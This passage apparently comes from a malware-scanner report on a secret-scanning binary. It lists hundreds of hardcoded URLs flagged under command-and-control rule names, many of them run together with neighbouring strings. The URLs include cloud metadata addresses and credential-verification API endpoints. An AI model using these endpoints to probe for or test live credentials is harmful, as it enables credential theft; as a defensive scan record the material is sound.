[https://api.ipinfodb.com/v3/ip](https://api.ipinfodb.com/v3/ip)
[https://api.mailjet.com/v4/sms](https://api.mailjet.com/v4/sms)
[https://api.mesibo.com/api.php](https://api.mesibo.com/api.php)
[https://api.pagar.me/1/balance](https://api.pagar.me/1/balance)
[https://api.scrapfly.io/scrape](https://api.scrapfly.io/scrape)
[https://api.stripe.com/v1/skus](https://api.stripe.com/v1/skus)
[https://api.userflow.com/users](https://api.userflow.com/users)
[https://apilayer.net/api/check](https://apilayer.net/api/check)
[https://authn.nvidia.com/token](https://authn.nvidia.com/token)
[https://coda.io/apis/v1/whoami](https://coda.io/apis/v1/whoami)
[https://cosmos.azure.comfailed](https://cosmos.azure.comfailed)
[https://timezoneapi.io/api/ip/](https://timezoneapi.io/api/ip/)
[https://v2.convertapi.com/user](https://v2.convertapi.com/user)
[https://www.appsynergy.com/api](https://www.appsynergy.com/api)
[http://www.w3.org/2002/07/owl](http://www.w3.org/2002/07/owl)
[http://www.w3.org/TR/2001/REC](http://www.w3.org/TR/2001/REC)
[https://api.apify.com/v2/acts](https://api.apify.com/v2/acts)
[https://api.cloverly.com/2019](https://api.cloverly.com/2019)
[https://api.github.comInclude](https://api.github.comInclude)
[https://api.logz.io/v2/whoami](https://api.logz.io/v2/whoami)
[https://api.nylas.com/account](https://api.nylas.com/account)
[https://api.vyte.in/v2/events](https://api.vyte.in/v2/events)
[https://google.comcrypto/ecdh](https://google.comcrypto/ecdh)
[https://graph.facebook.com/me](https://graph.facebook.com/me)
[https://vpnapi.io/api/8.8.8.8](https://vpnapi.io/api/8.8.8.8)
[http://Descriptionrelatively](http://Descriptionrelatively)
[https://api.documo.com/v1/me](https://api.documo.com/v1/me)
[https://api.etherscan.io/api](https://api.etherscan.io/api)
[https://api.jotform.com/user](https://api.jotform.com/user)
[https://api.linkpreview.net/](https://api.linkpreview.net/)
[https://api.openai.com/v1/me](https://api.openai.com/v1/me)
[https://api.roaring.io/token](https://api.roaring.io/token)
[https://api.telegram.org/bot](https://api.telegram.org/bot)
[https://api.webflow.com/info](https://api.webflow.com/info)
[https://github.com/google/go](https://github.com/google/go)
[https://github.com/llvm/llvm](https://github.com/llvm/llvm)
[https://huggingface.cofailed](https://huggingface.cofailed)
[https://sts.amazonaws.comnot](https://sts.amazonaws.comnot)
[https://www.planyo.com/rest/](https://www.planyo.com/rest/)
[http://www.w3.org/2005/Atom](http://www.w3.org/2005/Atom)
[https://api.bscscan.com/api](https://api.bscscan.com/api)
[https://api.edamam.com/auto](https://api.edamam.com/auto)
[https://api.figma.com/v1/me](https://api.figma.com/v1/me)
[https://api.geckoboard.com/](https://api.geckoboard.com/)
[https://api.github.com/2006](https://api.github.com/2006)
[https://api.heroku.com/apps](https://api.heroku.com/apps)
[https://api.ip2location.io/](https://api.ip2location.io/)
[https://api.qase.io/v1/user](https://api.qase.io/v1/user)
[https://api.twilio.com/2010](https://api.twilio.com/2010)
[https://api.typeform.com/me](https://api.typeform.com/me)
[https://api.zenrows.com/v1/](https://api.zenrows.com/v1/)
[https://cex.io/api/balance/](https://cex.io/api/balance/)
[https://deliver.kontent.ai/](https://deliver.kontent.ai/)
[https://geocode.xyz/51.4647](https://geocode.xyz/51.4647)
[https://gitlab.com/Skipping](https://gitlab.com/Skipping)
[https://jenkins.example.com](https://jenkins.example.com)
[https://neutrinoapi.net/url](https://neutrinoapi.net/url)
[https://registry.npmjs.org/](https://registry.npmjs.org/)
[http://169.254.170.2/redis](http://169.254.170.2/redis)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[https://api.podio.com/user](https://api.podio.com/user)
[https://api.scraperapi.com](https://api.scraperapi.com)
[https://api.tallyfy.com/me](https://api.tallyfy.com/me)
[https://payments.braintree](https://payments.braintree)
[https://sts.amazonaws.com/](https://sts.amazonaws.com/)
[http://localhost/truncate](http://localhost/truncate)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://www.interpretation](http://www.interpretation)
[https://api.deno.com/user](https://api.deno.com/user)
[https://api.monday.com/v2](https://api.monday.com/v2)
[https://api.shodan.io/api](https://api.shodan.io/api)
[https://collect2.com/api/](https://collect2.com/api/)
[https://github.com/dustin](https://github.com/dustin)
[http://mathematicsmargin](http://mathematicsmargin)
[https://ecs.aliyuncs.com](https://ecs.aliyuncs.com)
[https://iamcredentials..](https://iamcredentials..)
[https://pixabay.com/api/](https://pixabay.com/api/)
[https://push.databox.com](https://push.databox.com)
[http://applicationslink](http://applicationslink)
[https://google.comhttps](https://google.comhttps)
[https://v6.exchangerate](https://v6.exchangerate)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://staticsuggested](http://staticsuggested)
[https://api.adzuna.com](https://api.adzuna.com)
[https://api.kucoin.com](https://api.kucoin.com)
[https://api.sheety.co/](https://api.sheety.co/)
[https://api.whoxy.com/](https://api.whoxy.com/)
[https://apple.comhttps](https://apple.comhttps)
[https://dev.azure.com/](https://dev.azure.com/)
[https://gitlab.comScan](https://gitlab.comScan)
[https://www.bitmex.com](https://www.bitmex.com)
[http://iparticipation](http://iparticipation)
[https://dummysite.com](https://dummysite.com)
[https://staging.cloud](https://staging.cloud)
[http://www.language=](http://www.language=)
[https://commodities](https://commodities)
[https://foo.com/bar](https://foo.com/bar)
[https://scrutinizer](https://scrutinizer)
[http://interpreted](http://interpreted)
[http://www.hortcut](http://www.hortcut)
[https://api.travis](https://api.travis)
[https://app.travis](https://app.travis)
[https://www.recent](https://www.recent)
[http://google.com](http://google.com)
[http://interested](http://interested)
[http://navigation](http://navigation)
[http://www.C//DTD](http://www.C//DTD)
[http://www.style=](http://www.style=)
[https://technical](https://technical)
[https://www.World](https://www.World)
[http://according](http://according)
[http://encoding=](http://encoding=)
[http://imEnglish](http://imEnglish)
[http://site_name](http://site_name)
[http://www.years](http://www.years)
[https://api.meta](https://api.meta)
[https://file.io/](https://file.io/)
[https://ossrdbms](https://ossrdbms)
[https://www.easy](https://www.easy)
[http://familiar](http://familiar)
[http://www./div](http://www./div)
[http://www.icon](http://www.icon)
[http://www.text](http://www.text) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam](https%3A%2F%2Flocalhost%2Fdeprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam)
[https://api.openai.com/v1/assistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin](https%3A%2F%2Fapi.openai.com%2Fv1%2Fassistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin)
[https://api.mailgun.net/v4/domainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates](https%3A%2F%2Fapi.mailgun.net%2Fv4%2Fdomainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates)
[https://api.getpostman.com/meaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser](https%3A%2F%2Fapi.getpostman.com%2Fmeaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser)
[https://go.postman.co/workspaces/mail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers](https%3A%2F%2Fgo.postman.co%2Fworkspaces%2Fmail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers)
[https://api.openai.com/v1/filesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings](https%3A%2F%2Fapi.openai.com%2Fv1%2Ffilesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings)
[https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps](https%3A%2F%2Fgallery.usgovcloudapi.net%2Fmariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps)
[https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb](https%3A%2F%2Foauth2.mtls.googleapis.com%2Ftokengrpc.io%2Fserver%2Freceived_messages_per_rpcgrpc.io%2Fclient%2Freceived_messages_per_rpcgrpclb)
[https://api.getpostman.com/workspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps](https%3A%2F%2Fapi.getpostman.com%2Fworkspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps)
[https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fmicrosoftteams%2F.myfreshworks.com%2Fcrm%2Fsales%2Fapi%2Fsales_accounts%2Ffiltershttps)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot](https%3A%2F%2Fvault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot)
[https://github.com/pygments/pygments/blob/15f222adefd2bf7835bfd74a12d720028ae68d29/pygments/lexers/dalvik.py.](https%3A%2F%2Fgithub.com%2Fpygments%2Fpygments%2Fblob%2F15f222adefd2bf7835bfd74a12d720028ae68d29%2Fpygments%2Flexers%2Fdalvik.py.)
[https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32](https%3A%2F%2Fiamcredentials.mtls.googleapis.com%2Fbuffered_file_writer_total_write_size_byteshash%2Fadler32)
[https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazure.denegative](https%3A%2F%2Fbatch.cloudapi.de%2Fmysql.database.cloudapi.decloudapp.microsoftazure.denegative)
[https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA](https%3A%2F%2Fweather.visualcrossing.com%2FVisualCrossingWebServices%2Frest%2Fservices%2Ftimeline%2FLA)
[https://api.simplynoted.com/api/productsfakeTruffleHogAccessTokenForVerificationhttps](https%3A%2F%2Fapi.simplynoted.com%2Fapi%2FproductsfakeTruffleHogAccessTokenForVerificationhttps)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_record_summaries](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fsubscription_items%2Fnowaythiscanexist%2Fusage_record_summaries)
[https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot](https%3A%2F%2Fapi.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps](https%3A%2F%2Fstorage.azure.com%2Fdatabase.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps)
[https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht](https%3A%2F%2Fapi.airbrake.io%2Fapi%2Fv4%2Fprojects%2Fgrant_type%3Dclient_credentials%26client_id%3Dht)
[https://app.caflou.com/api/v1/accounts.currencycloud.com/v2/authenticate/apihttps](https%3A%2F%2Fapp.caflou.com%2Fapi%2Fv1%2Faccounts.currencycloud.com%2Fv2%2Fauthenticate%2Fapihttps)
[https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fnetlify%2F%2Fservices%2Frest%2Frecord%2Fv1%2Fmetadata)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_records](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fsubscription_items%2Fnowaythiscanexist%2Fusage_records)
[https://api.stripe.com/v1/billing/meters/nowaythiscanexist/event_summaries](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fbilling%2Fmeters%2Fnowaythiscanexist%2Fevent_summaries)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps](https%3A%2F%2Fvault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps)
[https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps](https%3A%2F%2Fstatuspal.io%2Fapi%2Fv1%2Fstatus_pages%2Fsecretscanner%2Fsubscriptionshttps)
[https://api.telnyx.com/v2/messaging_profilesapplication/vnd.tickettailor](https%3A%2F%2Fapi.telnyx.com%2Fv2%2Fmessaging_profilesapplication%2Fvnd.tickettailor)
[https://docs.stripe.com/api/usage_records/subscription_item_summary_list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fusage_records%2Fsubscription_item_summary_list)
[https://api.stripe.com/v1/tax/calculations/nowaycanthisexist/line_items](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftax%2Fcalculations%2Fnowaycanthisexist%2Fline_items)
[https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps](https%3A%2F%2Fgallery.chinacloudapi.cn%2Fmariadb.database.chinacloudapi.cnhttps)
[https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/](https%3A%2F%2Fanypoint.mulesoft.com%2Fapiplatform%2Frepository%2Fv2%2Forganizations%2F)
[https://api.flightstats.com/flex/aircraft/rest/v1/json/availableFields](https%3A%2F%2Fapi.flightstats.com%2Fflex%2Faircraft%2Frest%2Fv1%2Fjson%2FavailableFields)
[https://app.snipcart.com/api/ordersgrant_type=refresh_token&client_id=](https%3A%2F%2Fapp.snipcart.com%2Fapi%2Fordersgrant_type%3Drefresh_token%26client_id%3D)
[https://cloud.viewneo.com/api/v1.0/playlistapplication/vnd.zipcodebase](https%3A%2F%2Fcloud.viewneo.com%2Fapi%2Fv1.0%2Fplaylistapplication%2Fvnd.zipcodebase)
[https://developer.api.autodesk.com/authentication/v1/authenticateimage](https%3A%2F%2Fdeveloper.api.autodesk.com%2Fauthentication%2Fv1%2Fauthenticateimage)
[https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc](https%3A%2F%2Fapi.apifonica.com%2Fv2%2Faccounts%26my%3Dtrue%26offset%3D10%26limit%3D99%26desc)
[https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11](https%3A%2F%2Fhub.docker.com%2Fv2%2Fusers%2Floginapplication%2Fvnd.dyspatch.2020.11)
[https://api.stripe.com/v1/application_fees/nowaythiscanexist/refunds](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fapplication_fees%2Fnowaythiscanexist%2Frefunds)
[https://dataservice.accuweather.com/locations/v1/cities/autocomplete](https%3A%2F%2Fdataservice.accuweather.com%2Flocations%2Fv1%2Fcities%2Fautocomplete)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https%3A%2F%2Fvault.usgovcloudapi.net%2Fmysql.database.usgovcloudapi.nethttp)
[https://api.stripe.com/v1/terminal/configurations/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fterminal%2Fconfigurations%2Fnowaythiscanexist)
[https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps](https%3A%2F%2Fbatch.chinacloudapi.cn%2Fmysql.database.chinacloudapi.cnhttps)
[https://api.eu.newrelic.com/v2/users.jsonapplication/vnd.onesignal](https%3A%2F%2Fapi.eu.newrelic.com%2Fv2%2Fusers.jsonapplication%2Fvnd.onesignal)
[https://api.rocketreach.co/v2/api/accountapplication/vnd.semaphore](https%3A%2F%2Fapi.rocketreach.co%2Fv2%2Fapi%2Faccountapplication%2Fvnd.semaphore)
[https://api.stripe.com/v1/issuing/authorizations/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Fauthorizations%2Fnowaythiscanexist)
[https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https](https%3A%2F%2Ftrufflesecurity.com%2FcanariesDefaultEndpointsProtocol%3Dhttps)
[https://api.overloop.com/public/v1/usersapplication/vnd.pagerduty](https%3A%2F%2Fapi.overloop.com%2Fpublic%2Fv1%2Fusersapplication%2Fvnd.pagerduty)
[https://api.uclassify.com/v1/uClassify/Sentiment/classifyReceived](https%3A%2F%2Fapi.uclassify.com%2Fv1%2FuClassify%2FSentiment%2FclassifyReceived)
[https://docs.stripe.com/api/identity/verification_sessions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fidentity%2Fverification_sessions%2Fcreate)
[https://www.meistertask.com/api/projectsapplication/vnd.moonclerk](https%3A%2F%2Fwww.meistertask.com%2Fapi%2Fprojectsapplication%2Fvnd.moonclerk)
[http://169.254.169.254/latestProcessProviderExecutionErrorfailed](http%3A%2F%2F169.254.169.254%2FlatestProcessProviderExecutionErrorfailed)
[https://api.delighted.com/v1/people.jsonapplication/vnd.docusign](https%3A%2F%2Fapi.delighted.com%2Fv1%2Fpeople.jsonapplication%2Fvnd.docusign)
[https://api.kraken.com/0/private/Balanceapplication/vnd.loadmill](https%3A%2F%2Fapi.kraken.com%2F0%2Fprivate%2FBalanceapplication%2Fvnd.loadmill)
[https://api.stormboard.com/users/profileapplication/vnd.timecamp](https%3A%2F%2Fapi.stormboard.com%2Fusers%2Fprofileapplication%2Fvnd.timecamp)
[https://api.stripe.com/v1/issuing/transactions/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Ftransactions%2Fnowaythiscanexist)
[https://backboard.railway.app/graphql/v2application/vnd.sugester](https%3A%2F%2Fbackboard.railway.app%2Fgraphql%2Fv2application%2Fvnd.sugester)
[https://manage.windowsazure.us/publishsettings/indexunrecognized](https%3A%2F%2Fmanage.windowsazure.us%2Fpublishsettings%2Findexunrecognized)
[https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus](https%3A%2F%2Fmltb8350.hiveage.com%2Fapi%2Fnetworkapplication%2Fvnd.hybiscus)
[https://platform.devtest.ringcentral.com/restapi/oauth/authorize](https%3A%2F%2Fplatform.devtest.ringcentral.com%2Frestapi%2Foauth%2Fauthorize)
[https://www.googleapis.com/auth/devstorage.read_writecredentials](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_writecredentials)
[https://api.stripe.com/v1/confirmation_tokens/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fconfirmation_tokens%2Fnowaythiscanexist)
[https://api.stripe.com/v1/issuing/cardholders/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Fcardholders%2Fnowaythiscanexist)
[https://database.windows.net/postgres.database.cloudapi.dehttps](https%3A%2F%2Fdatabase.windows.net%2Fpostgres.database.cloudapi.dehttps)
[https://docs.stripe.com/api/identity/verification_sessions/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fidentity%2Fverification_sessions%2Flist)
[https://docs.stripe.com/api/issuing/funding_instructions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ffunding_instructions%2Fcreate)
[https://api.stytch.com/v1/users/pendingapplication/vnd.tatumio](https%3A%2F%2Fapi.stytch.com%2Fv1%2Fusers%2Fpendingapplication%2Fvnd.tatumio)
[https://api.twitter.com/oauth2/tokenapplication/vnd.uploadcare](https%3A%2F%2Fapi.twitter.com%2Foauth2%2Ftokenapplication%2Fvnd.uploadcare)
[https://app.magnetichq.com/Magnetic/rest/accountsAPI/itemTypes](https%3A%2F%2Fapp.magnetichq.com%2FMagnetic%2Frest%2FaccountsAPI%2FitemTypes)
[https://docs.stripe.com/api/payment_links/payment_links/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_links%2Fpayment_links%2Fcreate)
[https://gallery.cloudapi.de/mariadb.database.cloudapi.defailed](https%3A%2F%2Fgallery.cloudapi.de%2Fmariadb.database.cloudapi.defailed)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.full_controlstorage)
[https://api.stripe.com/v1/tax/registrations/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftax%2Fregistrations%2Fnowaycanthisexist)
[https://apiv2.bitcoinaverage.com/websocket/v3/get_tickethttps](https%3A%2F%2Fapiv2.bitcoinaverage.com%2Fwebsocket%2Fv3%2Fget_tickethttps)
[https://coveralls.io/api/repos/github/secretscanner02/scanner](https%3A%2F%2Fcoveralls.io%2Fapi%2Frepos%2Fgithub%2Fsecretscanner02%2Fscanner)
[https://dictionary.yandex.net/api/v1/dicservice.json/getLangs](https%3A%2F%2Fdictionary.yandex.net%2Fapi%2Fv1%2Fdicservice.json%2FgetLangs)
[https://docs.stripe.com/api/issuing/funding_instructions/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ffunding_instructions%2Flist)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https%3A%2F%2Fmanagedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://www.googleapis.com/auth/devstorage.read_onlywildcards](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_onlywildcards)
[https://api.optimizely.com/v2/projectsapplication/vnd.planyo](https%3A%2F%2Fapi.optimizely.com%2Fv2%2Fprojectsapplication%2Fvnd.planyo)
[https://api.stripe.com/v1/issuing/disputes/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Fdisputes%2Fnowaythiscanexist)
[https://docs.stripe.com/api/payment_links/payment_links/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_links%2Fpayment_links%2Flist)
[https://api.apilayer.com/number_verification/countrieshttps](https%3A%2F%2Fapi.apilayer.com%2Fnumber_verification%2Fcountrieshttps)
[https://api.storecove.com/api/v2/discovery/identifiershttps](https%3A%2F%2Fapi.storecove.com%2Fapi%2Fv2%2Fdiscovery%2Fidentifiershttps)
[https://api.stripe.com/v1/payment_methods/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpayment_methods%2Fnowaycanthisexist)
[https://api.stripe.com/v1/reviews/nowaycanthisexist/approve](https%3A%2F%2Fapi.stripe.com%2Fv1%2Freviews%2Fnowaycanthisexist%2Fapprove)
[https://api.tiingo.com/tiingo/fundamentals/definitionshttps](https%3A%2F%2Fapi.tiingo.com%2Ftiingo%2Ffundamentals%2Fdefinitionshttps)
[https://budibase.app/api/public/v1/applications/searchhttps](https%3A%2F%2Fbudibase.app%2Fapi%2Fpublic%2Fv1%2Fapplications%2Fsearchhttps)
[https://docs.stripe.com/api/confirmation_tokens/test_create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fconfirmation_tokens%2Ftest_create)
[https://docs.stripe.com/api/customer_portal/sessions/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcustomer_portal%2Fsessions%2Fcreate)
[https://docs.stripe.com/api/issuing/authorizations/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fauthorizations%2Fretrieve)
[https://industrial.api.ubidots.com/api/v1.6/variables/https](https%3A%2F%2Findustrial.api.ubidots.com%2Fapi%2Fv1.6%2Fvariables%2Fhttps)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https%3A%2F%2Fmanage.chinacloudapi.com%2Fpublishsettings%2Findexhttps)
[https://services.reachmail.net/administration/users/current](https%3A%2F%2Fservices.reachmail.net%2Fadministration%2Fusers%2Fcurrent)
[http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2](http%3A%2F%2Fwww.garmin.com%2Fxmlschemas%2FTrainingCenterDatabase%2Fv2)
[https://api.ngrok.com/agent_ingressesapplication/vnd.nylas](https%3A%2F%2Fapi.ngrok.com%2Fagent_ingressesapplication%2Fvnd.nylas)
[https://api.rs2.usw2.rockset.com/v1/orgs/self/querieshttps](https%3A%2F%2Fapi.rs2.usw2.rockset.com%2Fv1%2Forgs%2Fself%2Fquerieshttps)
[https://api.sandbox.signaturit.com/v3/signatures.jsonhttps](https%3A%2F%2Fapi.sandbox.signaturit.com%2Fv3%2Fsignatures.jsonhttps)
[https://api.stripe.com/v1/issuing/tokens/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Ftokens%2Fnowaythiscanexist)
[https://api.stripe.com/v1/test_helpers/confirmation_tokens](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftest_helpers%2Fconfirmation_tokens)
[https://example.teamwork.com/desk/api/v2/me.jsonRepository](https%3A%2F%2Fexample.teamwork.com%2Fdesk%2Fapi%2Fv2%2Fme.jsonRepository)
[https://example.teamwork.com/spaces/api/v1/users.jsonhttps](https%3A%2F%2Fexample.teamwork.com%2Fspaces%2Fapi%2Fv1%2Fusers.jsonhttps)
[https://gen.duply.co/v1/usagegrant_type=client_credentials](https%3A%2F%2Fgen.duply.co%2Fv1%2Fusagegrant_type%3Dclient_credentials)
[https://login.eagleeyenetworks.com/g/aaa/authenticatehttps](https%3A%2F%2Flogin.eagleeyenetworks.com%2Fg%2Faaa%2Fauthenticatehttps)
[https://manage.microsoftazure.de/publishsettings/indexhttp](https%3A%2F%2Fmanage.microsoftazure.de%2Fpublishsettings%2Findexhttp)
[https://pastebin.com/api/api_post.phpapplication/vnd.percy](https%3A%2F%2Fpastebin.com%2Fapi%2Fapi_post.phpapplication%2Fvnd.percy)
[https://test.api.amadeus.com/v1/security/oauth2/tokenhttps](https%3A%2F%2Ftest.api.amadeus.com%2Fv1%2Fsecurity%2Foauth2%2Ftokenhttps)
[http://schemas.microsoft.com/3dmanufacturing/core/2015/02](http%3A%2F%2Fschemas.microsoft.com%2F3dmanufacturing%2Fcore%2F2015%2F02)
[https://api.copper.com/developer_api/v1/tasks/searchhttps](https%3A%2F%2Fapi.copper.com%2Fdeveloper_api%2Fv1%2Ftasks%2Fsearchhttps)
[https://api.stripe.com/v1/billing/meter_event_adjustments](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fbilling%2Fmeter_event_adjustments)
[https://api.stripe.com/v1/issuing/cards/nowaythiscanexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fissuing%2Fcards%2Fnowaythiscanexist)
[https://api.stripe.com/v1/setup_intents/nowaycanthisexist](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fsetup_intents%2Fnowaycanthisexist)
[https://api.worldweatheronline.com/premium/v1/search.ashx](https%3A%2F%2Fapi.worldweatheronline.com%2Fpremium%2Fv1%2Fsearch.ashx)
[https://cloud.google.com/docs/authentication/external/set](https%3A%2F%2Fcloud.google.com%2Fdocs%2Fauthentication%2Fexternal%2Fset)
[https://docs.stripe.com/api/issuing/authorizations/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Fauthorizations%2Fupdate)
[https://docs.stripe.com/api/issuing/transactions/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fissuing%2Ftransactions%2Fretrieve)
[https://docs.stripe.com/api/payment_method_domains/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayment_method_domains%2Fcreate)
[https://docs.stripe.com/api/terminal/configuration/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fterminal%2Fconfiguration%2Fupdate)
[https://geoip.maxmind.com/geoip/v2.1/country/8.8.8.8https](https%3A%2F%2Fgeoip.maxmind.com%2Fgeoip%2Fv2.1%2Fcountry%2F8.8.8.8https)
[https://graph.windows.net/mariadb.database.azure.comhttps](https%3A%2F%2Fgraph.windows.net%2Fmariadb.database.azure.comhttps)
[https://moderationapi.com/api/v1/analyze/languagePostgres](https%3A%2F%2Fmoderationapi.com%2Fapi%2Fv1%2Fanalyze%2FlanguagePostgres)
[https://api.avaza.com/api/Account.blob.core.windows.net/](https%3A%2F%2Fapi.avaza.com%2Fapi%2FAccount.blob.core.windows.net%2F)
[https://api.cloudmersive.com/validate/address/parsehttps](https%3A%2F%2Fapi.cloudmersive.com%2Fvalidate%2Faddress%2Fparsehttps)
[https://api.ecostruxureit.com/rest/v1/organizationshttps](https%3A%2F%2Fapi.ecostruxureit.com%2Frest%2Fv1%2Forganizationshttps)
[https://api.rechargeapps.com/token_information&url=https](https%3A%2F%2Fapi.rechargeapps.com%2Ftoken_information%26url%3Dhttps)
[https://api.stripe.com/v1/credit_notes/nowaythiscanexsit](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fcredit_notes%2Fnowaythiscanexsit)
[https://api.stripe.com/v1/identity/verification_sessions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fidentity%2Fverification_sessions)
[https://api.thinkific.com/api/public/v1/collectionshttps](https%3A%2F%2Fapi.thinkific.com%2Fapi%2Fpublic%2Fv1%2Fcollectionshttps)
[https://api.twist.com/api/v3/users/get_session_userhttps](https%3A%2F%2Fapi.twist.com%2Fapi%2Fv3%2Fusers%2Fget_session_userhttps)
